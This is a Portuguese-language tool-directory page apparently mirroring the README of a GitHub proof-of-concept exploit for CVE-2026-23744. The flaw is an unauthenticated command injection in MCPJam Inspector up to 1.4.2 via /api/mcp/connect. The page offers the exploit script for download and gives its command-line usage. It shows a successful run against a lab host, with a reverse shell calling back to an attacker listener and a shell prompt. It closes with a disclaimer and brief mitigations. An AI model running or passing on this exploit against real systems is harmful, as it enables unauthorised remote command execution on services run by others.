Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mluex0/cve-2026-23744-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 é uma injeção de comandos não autenticada no MCPJam Inspector ≤1.4.2 via /api/mcp/connect. Este POC explora essa vulnerabilidade enviando um payload JSON personalizado para executar comandos arbitrários, concedendo um reverse shell com PTY.

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23744-PoC

Aviso legal:

Este proof-of-concept é fornecido exclusivamente para investigação de segurança autorizada, fins educativos e ambientes de laboratório controlados (por exemplo, HTB, CTF, ou testes de penetração internos com consentimento escrito explícito). A utilização não autorizada contra qualquer sistema sem permissão é ilegal e antiética. O autor não assume qualquer responsabilidade por utilização indevida; os utilizadores são os únicos responsáveis por cumprir todas as leis e regulamentos aplicáveis.


Descrição

CVE-2026-23744 é uma vulnerabilidade de injeção de comandos não autenticada no MCPJam Inspector (versão ≤ 1.4.2).
O endpoint /api/mcp/connect aceita um payload JSON com serverConfig.command e serverConfig.args e passa-os diretamente para a criação de um processo do sistema sem qualquer sanitização. Um atacante pode enviar um pedido malicioso para executar comandos arbitrários do sistema, obtendo uma reverse shell com os privilégios do utilizador do serviço.

Este repositório contém um script de exploit totalmente funcional com um listener interativo opcional baseado em PTY (ativado por padrão).


Requisitos

  • Python 3.6+
  • Biblioteca requests (pip install requests)

Uso

Importante: Forneça apenas o hostname ou IP. O script adiciona automaticamente http:// ou https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
OpçãoDescrição
-t, --targetHostname ou IP do alvo (obrigatório)
-p, --portPorta do alvo (padrão: 6274)
-l, --lhostSeu IP para a reverse shell (obrigatório)
-r, --lportSua porta de listener (padrão: 4444)
--sslUsar HTTPS em vez de HTTP
--check-onlyApenas verificar a vulnerabilidade, não enviar shell

Exemplo

O script inicia o seu próprio listener e fornece uma shell diretamente no seu terminal.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Prova de Conceito (Execução Bem-sucedida)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Mitigação

  • Sanitize todos os argumentos fornecidos pelo utilizador passados para funções que criam processos.
  • Não permita a execução arbitrária de comandos através de endpoints de API sem listas de permissões rigorosas e autenticação.
  • Execute os serviços com os privilégios mínimos – nunca como root.

Licença

Este repositório é apenas para fins educativos e de testes autorizados. Utilize por sua conta e risco.

Autor: Mluex0 Data: Agosto de 2026

Baixar ferramenta